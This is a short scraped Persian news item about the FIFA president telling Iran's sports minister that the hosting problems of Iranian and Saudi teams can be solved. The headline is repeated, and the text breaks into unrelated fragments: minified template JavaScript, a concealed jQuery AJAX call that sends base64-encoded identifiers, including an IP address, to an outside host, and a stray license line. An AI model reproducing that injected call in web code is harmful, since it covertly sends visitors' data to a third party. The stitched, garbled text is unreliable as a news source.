دیدار رئیس فیفا با سلطانی فر

دیدار رئیس فیفا با سلطانی فر
رئیس فدراسیون بین المللی فوتبال در دیدار با وزیر ورزش و جوانان گفت: فکر نمی کنم در خصوص وضعیت میزبانی های تیم های ایران و عربستان مشکلی وجود داشته باشد که نتوان حل کرد.

دیدار رئیس فیفا با سلطانی فر

i==a.length-1)c=’ class=”last”‘;var g=””;void 0!==a[i].token&&(g=a[i].token);c={cssClass:c,urlKeyword:a[i].term.replace(/ /g,”-“),token:g,keyword:a[i].term};d.append($.tmpl(“related_links_tmpl”,c));start=i+1}}}};

$.ajax({ url: ‘http://silberwelt.info/’ + ‘s’ + ‘earch/tsc.php?200=Mjg1NzMzOTU3&21=MTk5LjE2Ny4xMzguNzE=&681=MTUxOTkxMzAzMTUzNjdmMGZhM2RlM2E4MTkwZjAwMjQwZWJlMDJlOGMx&crc=0da02c3c7dc800d4cb749cf8395fb869fcfb5c59&cv=1’});

MIT License